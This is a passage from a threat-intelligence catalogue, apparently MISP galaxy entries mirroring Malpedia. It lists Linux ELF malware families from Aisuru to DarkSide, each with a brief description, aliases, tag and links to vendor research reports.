Honeypot-aware variant of Mirai.

The tag is: misp-galaxy:malpedia="Aisuru"

Aisuru is also known as:

Table 2264. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.aisuru

https://insights.oem.avira.com/new-mirai-variant-aisuru-detects-cowrie-opensource-honeypots/

Akira (ELF)

Ransomware

The tag is: misp-galaxy:malpedia="Akira (ELF)"

Akira (ELF) is also known as:

Table 2265. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.akira

https://labs.k7computing.com/index.php/akiras-play-with-linux/

AVrecon

AVrecon is a Linux-based Remote Access Trojan (RAT) targeting small-office/home-office (SOHO) routers and other ARM-embedded devices. The malware is distributed via exploitation of unpatched vulnerabilities or common misconfiguration of the targeted devices. Once deployed, AVreckon will collect some information about the infected device, open a session to pre-configured C&C server, and spawn a remote shell for command execution. It might also download additional arbitrary files and run them. The malware has recently been used in campaigns aimed at ad-fraud activities, password spraying and data exfiltration.

The tag is: misp-galaxy:malpedia="AVrecon"

AVrecon is also known as:

Table 2269. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.avrecon

https://spur.us/2023/07/christmas-in-july-a-finely-wrapped-proxy-service/

https://twitter.com/BlackLotusLabs/status/1684290046235484160

https://krebsonsecurity.com/2023/07/who-and-what-is-behind-the-malware-proxy-service-socksescort/

https://blog.lumen.com/routers-from-the-underground-exposing-avrecon/

azazel

Azazel is a Linux user-mode rootkit based off of a technique from the Jynx rootkit (LD_PRELOAD technique). Azazel is purportedly more robust than Jynx and has many more anti-analysis features

The tag is: misp-galaxy:malpedia="azazel"

azazel is also known as:

Table 2270. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.azazel

https://github.com/chokepoint/azazel

B1txor20

B1txor20 is a malware that was discovered by 360 Netlab along others exploiting Log4J. the name is derived from using the file name "b1t", the XOR encrpytion algorithm, and the RC4 algorithm key length of 20 bytes. According to 360 Netlab this Backdoor for Linux platform uses DNS Tunnel to build a C2 communication channel. They also had the assumption that the malware is still in development, because of some bugs and not fully implemented features.

The tag is: misp-galaxy:malpedia="B1txor20"

B1txor20 is also known as:

Table 2271. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.b1txor20

https://blog.netlab.360.com/b1txor20-use-of-dns-tunneling_cn/

Babuk (ELF)

ESX and NAS modules for Babuk ransomware.

The tag is: misp-galaxy:malpedia="Babuk (ELF)"

Babuk (ELF) is also known as:

Table 2272. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.babuk

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://raw.githubusercontent.com/antonioCoco/infosec-talks/main/InsomniHack_2022_Ransomware_Encryption_Internals.pdf

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/hypervisor-jackpotting-ecrime-actors-increase-targeting-of-esxi-servers/

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://www.advintel.io/post/groove-vs-babuk-groove-ransom-manifesto-ramp-underground-platform-secret-inner-workings

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://marcoramilli.com/2021/07/05/babuk-ransomware-the-builder/

https://krebsonsecurity.com/2023/05/russian-hacker-wazawaka-indicted-for-ransomware/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

Backdoorit

According to Avast Decoded, Backdoorit is a multiplatform RAT written in Go programming language and supporting both Windows and Linux/Unix operating systems. In many places in the code it is also referred to as backd00rit.

The tag is: misp-galaxy:malpedia="Backdoorit"

Backdoorit is also known as:

  • backd00rit

Table 2273. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoorit

https://decoded.avast.io/davidalvarez/go-malware-on-the-rise/

Irc16

The tag is: misp-galaxy:malpedia="Irc16"

Irc16 is also known as:

Table 2274. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.backdoor_irc16

https://news.drweb.com/show/?c=5&i=10193&lng=en

BADCALL (ELF)

BADCALL is a Trojan malware variant used by the group Lazarus Group.

The tag is: misp-galaxy:malpedia="BADCALL (ELF)"

BADCALL (ELF) is also known as:

Table 2275. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.badcall

https://www.welivesecurity.com/2023/04/20/linux-malware-strengthens-links-lazarus-3cx-supply-chain-attack

Bashlite

Bashlite is a malware family which infects Linux systems in order to launch distributed denial-of-service attacks (DDoS). Originally it was also known under the name Bashdoor, but this term now refers to the exploit method used by the malware. It has been used to launch attacks of up to 400 Gbps.

The tag is: misp-galaxy:malpedia="Bashlite"

Bashlite is also known as:

  • Gafgyt

  • gayfgt

  • lizkebab

  • qbot

  • torlus

Table 2276. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bashlite

https://unit42.paloaltonetworks.com/new-hoaxcalls-ddos-botnet/

https://unit42.paloaltonetworks.com/hoaxcalls-mirai-target-legacy-symantec-web-gateways/

https://blog.netlab.360.com/wo-men-kan-dao-de-wu-ke-lan-bei-ddosgong-ji-xi-jie/

https://blog.netlab.360.com/the-gafgyt-variant-vbot-and-its-31-campaigns/

https://unit42.paloaltonetworks.com/cve-2022-22954-vmware-vulnerabilities/

https://www.uptycs.com/blog/discovery-of-simps-botnet-leads-ties-to-keksec-group

https://krebsonsecurity.com/2016/09/krebsonsecurity-hit-with-record-ddos/

https://cybersecurity.att.com/blogs/labs-research/code-similarity-analysis-with-r2diaphora

https://cujo.com/mirai-gafgyt-with-new-ddos-modules-discovered/

https://unit42.paloaltonetworks.com/unit42-multi-exploit-iotlinux-botnets-mirai-gafgyt-target-apache-struts-sonicwall/

https://www.virusbulletin.com/uploads/pdf/conference/vb2015/KalnaiHorejsi-VB2015.pdf

http://blog.trendmicro.com/trendlabs-security-intelligence/bashlite-affects-devices-running-on-busybox/

https://www.nozominetworks.com/blog/could-threat-actors-be-downgrading-their-malware-to-evade-detection/

https://blog.netlab.360.com/some_details_of_the_ddos_attacks_targeting_ukraine_and_russia_in_recent_days/

https://maxkersten.nl/binary-analysis-course/malware-analysis/corona-ddos-bot/

https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf

https://blog.netlab.360.com/public-cloud-threat-intelligence-202203/

https://www.uptycs.com/blog/mirai-code-re-use-in-gafgyt

https://www.avira.com/en/blog/a-gafgyt-variant-that-exploits-pulse-secure-cve-2020-8218

https://blog.netlab.360.com/gafgtyt_tor-and-necro-are-on-the-move-again/

BCMPUPnP_Hunter

The tag is: misp-galaxy:malpedia="BCMPUPnP_Hunter"

BCMPUPnP_Hunter is also known as:

Table 2277. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bcmpupnp_hunter

https://blog.netlab.360.com/bcmpupnp_hunter-a-100k-botnet-turns-home-routers-to-email-spammers-en/

BiBi-Linux

According to Security Joes, this malware is an x64 ELF executable, lacking obfuscation or protective measures. It allows attackers to specify target folders and can potentially destroy an entire operating system if run with root permissions. During execution, it produces extensive output, which can be mitigated using the "nohup" command. It also leverages multiple threads and a queue to corrupt files concurrently, enhancing its speed and reach. Its actions include overwriting files, renaming them with a random string containing "BiBi," and excluding certain file types from corruption.

The tag is: misp-galaxy:malpedia="BiBi-Linux"

BiBi-Linux is also known as:

Table 2279. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bibi_linux

https://www.securityjoes.com/post/bibi-linux-a-new-wiper-dropped-by-pro-hamas-hacktivist-group

Bifrost

Linux version of the bifrose malware that originally targeted Windows platform only. The backdoor has the ability to perform file management, start or end a process, or start a remote shell. The connection is encrypted using a modified RC4 algorithm.

The tag is: misp-galaxy:malpedia="Bifrost"

Bifrost is also known as:

  • elf.bifrose

Table 2280. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bifrost

https://cyberandramen.net/2022/12/30/a-quick-look-at-elf-bifrose/

https://teamt5.org/tw/posts/technical-analysis-on-backdoor-bifrost-of-the-Chinese-apt-group-huapi/

https://jp.security.ntt/resources/EN-BlackTech_2021.pdf

https://twitter.com/strinsert1Na/status/1595553530579890176

BigViktor

A DDoS bot abusing CVE-2020-8515 to target DrayTek Vigor routers. It uses a wordlist-based DGA to generate its C&C domains.

The tag is: misp-galaxy:malpedia="BigViktor"

BigViktor is also known as:

Table 2281. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bigviktor

https://blog.netlab.360.com/bigviktor-dga-botnet/

BioSet

The tag is: misp-galaxy:malpedia="BioSet"

BioSet is also known as:

Table 2282. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bioset

https://twitter.com/IntezerLabs/status/1409844721992749059

BlackCat (ELF)

ALPHV, also known as BlackCat or Noberus, is a ransomware family that is deployed as part of Ransomware as a Service (RaaS) operations. ALPHV is written in the Rust programming language and supports execution on Windows, Linux-based operating systems (Debian, Ubuntu, ReadyNAS, Synology), and VMWare ESXi. ALPHV is marketed as ALPHV on cybercrime forums, but is commonly called BlackCat by security researchers due to an icon of a black cat appearing on its leak site. ALPHV has been observed being deployed in ransomware attacks since November 18, 2021.

ALPHV can be configured to encrypt files using either the AES or ChaCha20 algorithms. In order to maximize the amount of ransomed data, ALPHV can delete volume shadow copies, stop processes and services, and stop virtual machines on ESXi servers. ALPHV can self-propagate by using PsExec to remote execute itself on other hosts on the local network.

The tag is: misp-galaxy:malpedia="BlackCat (ELF)"

BlackCat (ELF) is also known as:

  • ALPHV

  • Noberus

Table 2284. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackcat

https://twitter.com/sisoma2/status/1473243875158499330

https://www.forescout.com/resources/analysis-of-an-alphv-incident

https://www.advintel.io/post/blackcat-in-a-shifting-threat-landscape-it-helps-to-land-on-your-feet-tech-dive

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://x.com/vxunderground/status/1731138180672344095?t=reBMQQFFMGQ_zkV8KmL_LA&s=01

https://killingthebear.jorgetesta.tech/actors/alphv

https://www.zdnet.com/article/blackcat-ransomware-implicated-in-attack-on-german-oil-companies/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://github.com/rivitna/Malware/tree/main/BlackCat/ALPHV3

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://www.theregister.com/2022/03/22/talos-ransomware-blackcat/

https://mssplab.github.io/threat-hunting/2023/07/13/malware-analysis-blackcat.html

https://krebsonsecurity.com/2022/01/who-wrote-the-alphv-blackcat-ransomware-strain/

https://securityintelligence.com/posts/blackcat-ransomware-levels-up-stealth-speed-exfiltration/

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://www.crowdstrike.com/blog/hypervisor-jackpotting-lack-of-antivirus-support-opens-the-door-to-adversaries/

https://www.bleepingcomputer.com/news/security/hive-ransomware-ports-its-linux-vmware-esxi-encryptor-to-rust/

https://www.intrinsec.com/alphv-ransomware-gang-analysis/

https://securelist.com/a-bad-luck-blackcat/106254/

https://blog.group-ib.com/blackcat

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/blackcat-ransomware-as-a-service.html

https://www.cisa.gov/sites/default/files/2023-11/aa23-320a_scattered_spider.pdf

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://news.sophos.com/en-us/2022/07/14/blackcat-ransomware-attacks-not-merely-a-byproduct-of-bad-luck/

https://noticeofpleadings.com/crackedcobaltstrike/files/ComplaintAndSummons/1%20-Microsoft%20Cobalt%20Strike%20-%20Complaint(907040021.9).pdf

https://www.computerweekly.com/news/252525240/ALPHV-BlackCat-ransomware-family-becoming-more-dangerous

https://securityscorecard.com/research/the-increase-in-ransomware-attacks-on-local-governments

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://blog.emsisoft.com/en/40931/ransomware-profile-alphv/

BlackMatter (ELF)

The tag is: misp-galaxy:malpedia="BlackMatter (ELF)"

BlackMatter (ELF) is also known as:

Table 2285. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.blackmatter

https://thehackernews.com/2022/04/researchers-connect-blackcat-ransomware.html

https://umbrella.cisco.com/blog/cybersecurity-threat-spotlight-blackmatter-lockbit-thor

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://us-cert.cisa.gov/ncas/alerts/aa21-291a

https://www.youtube.com/watch?v=NIiEcOryLpI

https://twitter.com/GelosSnake/status/1451465959894667275

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://medium.com/s2wlab/blackmatter-x-babuk-using-the-same-web-server-for-sharing-leaked-files-d01c20a74751

https://blog.talosintelligence.com/2022/03/from-blackmatter-to-blackcat-analyzing.html

https://twitter.com/VK_Intel/status/1423188690126266370

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-embraces-big-game-hunting-part-2/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

https://www.elliptic.co/blog/darkside-bitcoins-on-the-move-following-government-cyberattack-against-revil-ransomware-group

https://therecord.media/darkside-ransomware-gang-moves-some-of-its-bitcoin-after-revil-got-hit-by-law-enforcement/

https://medium.com/s2wlab/groove-x-ramp-the-relation-between-groove-babuk-ramp-and-blackmatter-f75644f8f92d

https://www.bleepingcomputer.com/news/security/linux-version-of-blackmatter-ransomware-targets-vmware-esxi-servers/

https://www.crowdstrike.com/blog/big-game-hunting-on-the-rise-again-according-to-ecrime-index/

https://blogs.blackberry.com/en/2021/09/threat-thursday-blackmatter-ransomware-as-a-service

https://medium.com/s2wlab/grooves-thoughts-on-blackmatter-babuk-and-interruption-in-the-supply-of-cheese-in-the-b5328bc764f2

https://news.sophos.com/en-us/2021/08/09/blackmatter-ransomware-emerges-from-the-shadow-of-darkside/

https://www.bleepingcomputer.com/news/security/blackmatter-ransomware-moves-victims-to-lockbit-after-shutdown/

https://www.mandiant.com/resources/chasing-avaddon-ransomware

https://www.mcafee.com/blogs/enterprise/mcafee-enterprise-atr/how-groove-gang-is-shaking-up-the-ransomware-as-a-service-market-to-empower-affiliates/

https://blog.group-ib.com/blackmatter2

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.hhs.gov/sites/default/files/demystifying-blackmatter.pdf

BlackSuit (ELF)

According to Trend Micro, this ransomware has significant code overlap with Royal Ransomware.

The tag is: misp-galaxy:malpedia="BlackSuit (ELF)"

BlackSuit (ELF) is also known as:

Table 2287. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.blacksuit

https://www.trendmicro.com/en_us/research/23/e/investigating-blacksuit-ransomwares-similarities-to-royal.html

https://blog.cyble.com/2023/05/12/blacksuit-ransomware-strikes-windows-and-linux-users/

BOLDMOVE (ELF)

According to Mandiant, this malware family is attributed to potential chinese background and directly related to observed exploitation of Fortinet’s SSL-VPN (CVE-2022-42475). There is also a Windows variant.

The tag is: misp-galaxy:malpedia="BOLDMOVE (ELF)"

BOLDMOVE (ELF) is also known as:

Table 2288. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.boldmove

https://thehackernews.com/2023/01/new-chinese-malware-spotted-exploiting.html

https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw

Break out the Box

This is a pentesting tool and according to the author, "BOtB is a container analysis and exploitation tool designed to be used by pentesters and engineers while also being CI/CD friendly with common CI/CD technologies.".

It has been observed being used by TeamTNT in their activities for spreading crypto-mining malware.

The tag is: misp-galaxy:malpedia="Break out the Box"

Break out the Box is also known as:

  • BOtB

Table 2289. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.botb

https://github.com/brompwnie/botb

BPFDoor

BPFDoor is a passive backdoor used by a China-based threat actor. This backdoor supports multiple protocols for communicating with a C2 including TCP, UDP, and ICMP allowing the threat actor a variety of mechanisms to interact with the implant.

The tag is: misp-galaxy:malpedia="BPFDoor"

BPFDoor is also known as:

  • JustForFun

Table 2291. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.bpfdoor

https://exatrack.com/public/Tricephalic_Hellkeeper.pdf

https://twitter.com/cyb3rops/status/1523227511551033349

https://blog.qualys.com/vulnerabilities-threat-research/2022/08/01/heres-a-simple-script-to-detect-the-stealthy-nation-state-bpfdoor

https://www.bleepingcomputer.com/news/security/stealthier-version-of-linux-bpfdoor-malware-spotted-in-the-wild/

https://unfinished.bike/fun-with-the-new-bpfdoor-2023

https://www.trendmicro.com/en_us/research/23/g/detecting-bpfdoor-backdoor-variants-abusing-bpf-filters.html

https://www.sandflysecurity.com/blog/bpfdoor-an-evasive-linux-backdoor-technical-analysis/

https://doublepulsar.com/bpfdoor-an-active-chinese-global-surveillance-tool-54b078f1a896

https://twitter.com/CraigHRowland/status/1523266585133457408

https://www.crowdstrike.com/blog/how-to-hunt-for-decisivearchitect-and-justforfun-implant/

https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game

https://www.pwc.com/gx/en/issues/cybersecurity/cyber-threat-intelligence/cyber-year-in-retrospect/yir-cyber-threats-report-download.pdf

https://nikhilh-20.github.io/blog/cbpf_bpfdoor/

https://www.mandiant.com/resources/blog/chinese-espionage-tactics

https://elastic.github.io/security-research/intelligence/2022/05/04.bpfdoor/article/

https://troopers.de/troopers22/talks/7cv8pz/

brute_ratel

The tag is: misp-galaxy:malpedia="brute_ratel"

brute_ratel is also known as:

Table 2292. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.brute_ratel

https://bruteratel.com/

Caja

Linux malware cross-compiled for x86, MIPS, ARM. XOR encoded strings, 13 commands supported for its C&C, including downloading, file modification and execution and ability to run shell commands.

The tag is: misp-galaxy:malpedia="Caja"

Caja is also known as:

Table 2294. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.caja

https://mp.weixin.qq.com/s/pd6fUs5TLdBtwUHauclDOQ

Caligula

According to Avast Decoded, Caligula is an IRC multiplatform bot that allows to perform DDoS attacks. It is written in Go and distributed in ELF files targeting Intel 32/64bit code, as well as ARM 32bit and PowerPC 64bit. It is based on the Hellabot open source project.

The tag is: misp-galaxy:malpedia="Caligula"

Caligula is also known as:

Table 2295. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.caligula

https://decoded.avast.io/davidalvarez/go-malware-on-the-rise/

Capoae

XMRig-based mining malware written in Go.

The tag is: misp-galaxy:malpedia="Capoae"

Capoae is also known as:

Table 2296. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.capoae

https://www.akamai.com/blog/security/capoae-malware-ramps-up-uses-multiple-vulnerabilities-and-tactics-to-spread

CDRThief

The tag is: misp-galaxy:malpedia="CDRThief"

CDRThief is also known as:

Table 2298. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cdrthief

https://www.welivesecurity.com/2020/09/10/who-callin-cdrthief-linux-voip-softswitches/

Cephei

The tag is: misp-galaxy:malpedia="Cephei"

Cephei is also known as:

Table 2299. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cephei

https://cybersecurity.att.com/blogs/labs-research/malware-using-new-ezuri-memory-loader

Cetus

The tag is: misp-galaxy:malpedia="Cetus"

Cetus is also known as:

Table 2300. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cetus

https://unit42.paloaltonetworks.com/cetus-cryptojacking-worm/

Chaos (ELF)

Multi-functional malware written in Go, targeting both Linux and Windows, evolved from elf.kaiji.

The tag is: misp-galaxy:malpedia="Chaos (ELF)"

Chaos (ELF) is also known as:

Table 2301. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.chaos

https://blog.lumen.com/chaos-is-a-go-based-swiss-army-knife-of-malware/

https://www.trendmicro.com/en_us/research/22/l/linux-cryptomining-enhanced-via-chaos-rat-.html

Chisel (ELF)

Chisel is an open-source project by Jaime Pillora (jpillora) that allows tunneling TCP and UDP connections via HTTP. It is available across platforms and written in Go. While benign in itself, Chisel has been utilized by multiple threat actors. It was for example observed by SentinelOne during a PYSA ransomware campaign to achieve persistence and used as backdoor. Github: https://github.com/jpillora/chisel

The tag is: misp-galaxy:malpedia="Chisel (ELF)"

Chisel (ELF) is also known as:

Table 2303. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.chisel

https://www.sentinelone.com/blog/from-the-front-lines-peering-into-a-pysa-ransomware-attack/

ConnectBack

ConnectBack malware is a type of malicious software designed to establish unauthorized connections from an infected system to a remote server. Once a victim’s device is compromised, ConnectBack creates a covert channel for communication, allowing the attacker to remotely control and gather sensitive information from the compromised system.

The tag is: misp-galaxy:malpedia="ConnectBack"

ConnectBack is also known as:

  • Getshell

Table 2306. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.connectback

https://labs.sucuri.net/signatures/malwares/pl-backdoor-connectback-001/

Conti (ELF)

Ransomware

The tag is: misp-galaxy:malpedia="Conti (ELF)"

Conti (ELF) is also known as:

  • Conti Locker

Table 2307. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.conti

https://intel471.com/blog/malware-before-ransomware-trojan-information-stealer-cobalt-strike

https://resources.prodaft.com/wazawaka-report

https://www.advintel.io/post/advintel-s-state-of-emotet-aka-spmtools-displays-over-million-compromised-machines-through-2022

https://www.secureworks.com/blog/gold-ulrick-continues-conti-operations-despite-public-disclosures

https://securelist.com/new-ransomware-trends-in-2022/106457/

https://www.justice.gov/opa/pr/multiple-foreign-nationals-charged-connection-trickbot-malware-and-conti-ransomware

https://query.prod.cms.rt.microsoft.com/cms/api/am/binary/RE54L7v

https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2022/06/23093553/Common-TTPs-of-the-modern-ransomware_low-res.pdf

https://www.esentire.com/blog/analysis-of-leaked-conti-intrusion-procedures-by-esentires-threat-response-unit-tru

https://damonmccoy.com/papers/Ransomware_eCrime22.pdf

https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/conti-group-targets-esxi-hypervisors-with-its-linux-variant.html

https://www.youtube.com/watch?v=cYx7sQRbjGA

https://www.microsoft.com/security/blog/2022/05/09/ransomware-as-a-service-understanding-the-cybercrime-gig-economy-and-how-to-protect-yourself

https://www.threatstop.com/blog/first-conti-then-hive-costa-rica-gets-hit-with-ransomware-again

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

Cpuminer (ELF)

This was observed to be pushed by IoT malware, abusing devices for LiteCoin and BitCoin mining.

The tag is: misp-galaxy:malpedia="Cpuminer (ELF)"

Cpuminer (ELF) is also known as:

Table 2308. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cpuminer

https://yoroi.company/research/outlaw-is-back-a-new-crypto-botnet-targets-european-organizations/

https://github.com/pooler/cpuminer

CronRAT

A malware written in Bash that hides in the Linux calendar system on February 31st. Observed in relation to Magecart attacks.

The tag is: misp-galaxy:malpedia="CronRAT"

CronRAT is also known as:

Table 2310. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cronrat

https://sansec.io/research/cronrat

According to CISA, Cyclops Blink appears to be a replacement framework for the VPNFilter malware exposed in 2018, and which exploited network devices, primarily small office/home office (SOHO) routers and network attached storage (NAS) devices. Cyclops Blink has been deployed since at least June 2019, fourteen months after VPNFilter was disrupted. In common with VPNFilter, Cyclops Blink deployment also appears indiscriminate and widespread. The actor has so far primarily deployed Cyclops Blink to WatchGuard and ASUS devices, but it is likely that Sandworm would be capable of compiling the malware for other architectures and firmware.

The tag is: misp-galaxy:malpedia="CyclopsBlink"

CyclopsBlink is also known as:

Table 2311. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.cyclops_blink

https://inquest.net/blog/2022/04/07/ukraine-cyberwar-overview

https://www.justice.gov/opa/video/attorney-general-merrick-b-garland-announces-enforcement-actions-disrupt-and-prosecute

https://attack.mitre.org/groups/G0034

https://www.justice.gov/opa/press-release/file/1491281/download

https://www.justice.gov/opa/pr/justice-department-announces-court-authorized-disruption-botnet-controlled-russian-federation

https://www.bleepingcomputer.com/news/security/us-disrupts-russian-cyclops-blink-botnet-before-being-used-in-attacks/

https://www.bleepingcomputer.com/news/security/asus-warns-of-cyclops-blink-malware-attacks-targeting-routers/

https://www.theregister.com/2022/03/18/cyclops_asus_routers/

https://www.trendmicro.com/en_us/research/22/c/cyclops-blink-sets-sights-on-asus-routers--.html

https://www.cisa.gov/uscert/ncas/alerts/aa22-054a

https://github.com/trendmicro/research/blob/main/cyclops_blink/c2-scripts/check.py

https://www.splunk.com/en_us/blog/security/strt-ta03-cpe-destructive-software.html

https://www.bleepingcomputer.com/news/security/cisa-warns-orgs-of-watchguard-bug-exploited-by-russian-state-hackers/

https://www.shadowserver.org/news/shadowserver-special-reports-cyclops-blink/

https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/c/cyclops-blink-sets-sights-on-asus-routers/Appendix_Cyclops%20Blink%20Sets%20Sights%20on%20ASUS%20Routers.pdf

Dacls (ELF)

According to PCrisk, Dacls is the name of a remote access Trojan (RAT), a malicious program that allows cyber criminals to control infected computers remotely.

Research shows that this malware is tied to Lazarus Group (a group of cyber criminals) and targets Linux and the Windows Operating System. Typically, cyber criminals use RATs to steal sensitive, confidential information, infect systems with other malware, and so on. In any case, no RAT is harmless and should be uninstalled immediately.

The tag is: misp-galaxy:malpedia="Dacls (ELF)"

Dacls (ELF) is also known as:

Table 2312. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.dacls

https://www.intezer.com/blog/cloud-security/top-linux-cloud-threats-of-2020/

https://blog.netlab.360.com/dacls-the-dual-platform-rat/

https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf

https://vblocalhost.com/uploads/VB2021-Park.pdf

https://securelist.com/lazarus-on-the-hunt-for-big-game/97757/

https://www.sygnia.co/mata-framework

https://securelist.com/mata-multi-platform-targeted-malware-framework/97746/

https://securelist.com/apt-trends-report-q2-2020/97937/

https://securelist.com/an-overview-of-targeted-attacks-and-apts-on-linux/98440/

https://intezer.com/blog/linux/elf-malware-analysis-101-linux-threats-no-longer-an-afterthought

DarkSide (ELF)

The tag is: misp-galaxy:malpedia="DarkSide (ELF)"

DarkSide (ELF) is also known as:

Table 2315. Table References

Links

https://malpedia.caad.fkie.fraunhofer.de/details/elf.darkside

https://www.maltego.com/blog/chasing-darkside-affiliates-identifying-threat-actors-connected-to-darkside-ransomware-using-maltego-intel-471-1/

https://pylos.co/2021/05/13/mind-the-air-gap/

https://www.bleepingcomputer.com/news/security/popular-russian-hacking-forum-xss-bans-all-ransomware-topics/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-rushes-to-cash-out-7-million-in-bitcoin/

https://blog.group-ib.com/blackmatter#

https://medium.com/s2wlab/w1-jun-en-story-of-the-week-ransomware-on-the-darkweb-af491d33868b

https://www.guidepointsecurity.com/from-zloader-to-darkside-a-ransomware-story/

https://www.vmware.com/content/dam/digitalmarketing/vmware/en/pdf/docs/vmw-exposing-malware-in-linux-based-multi-cloud-environments.pdf

https://therecord.media/darkside-ransomware-gang-says-it-lost-control-of-its-servers-money-a-day-after-biden-threat/

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/?utm_campaign=blog&utm_medium=soc&utm_source=twtr&utm_content=sprout

https://cybersecurity.att.com/blogs/labs-research/darkside-raas-in-linux-version

https://www.crowdstrike.com/blog/falcon-protects-from-darkside-ransomware/

https://twitter.com/GelosSnake/status/1451465959894667275

https://www.youtube.com/watch?v=NIiEcOryLpI

https://www.elliptic.co/blog/elliptic-follows-bitcoin-ransoms-paid-by-darkside-ransomware-victims

https://therecord.media/darkside-gang-estimated-to-have-made-over-90-million-from-ransomware-attacks/

https://www.digitalshadows.com/blog-and-research/ransomware-as-a-service-rogue-affiliates-and-whats-next/

https://krebsonsecurity.com/2021/08/ransomware-gangs-and-the-name-game-distraction/

https://blogs.vmware.com/security/2022/09/esxi-targeting-ransomware-the-threats-that-are-after-your-virtual-machines-part-1.html

https://therecord.media/popular-hacking-forum-bans-ransomware-ads/

https://www.bleepingcomputer.com/news/security/darkside-ransomware-servers-reportedly-seized-revil-restricts-targets/

https://symantec.broadcom.com/hubfs/The_Ransomware_Threat_September_2021.pdf

https://www.crowdstrike.com/blog/carbon-spider-sprite-spider-target-esxi-servers-with-ransomware/

https://www.nytimes.com/2021/05/29/world/europe/ransomware-russia-darkside.html

https://www.justice.gov/opa/pr/department-justice-seizes-23-million-cryptocurrency-paid-ransomware-extortionists-darkside

https://krebsonsecurity.com/2021/05/darkside-ransomware-gang-quits-after-servers-bitcoin-stash-seized/

https://www.crowdstrike.com/blog/how-big-game-hunting-ttps-shifted-after-darkside-pipeline-attack/

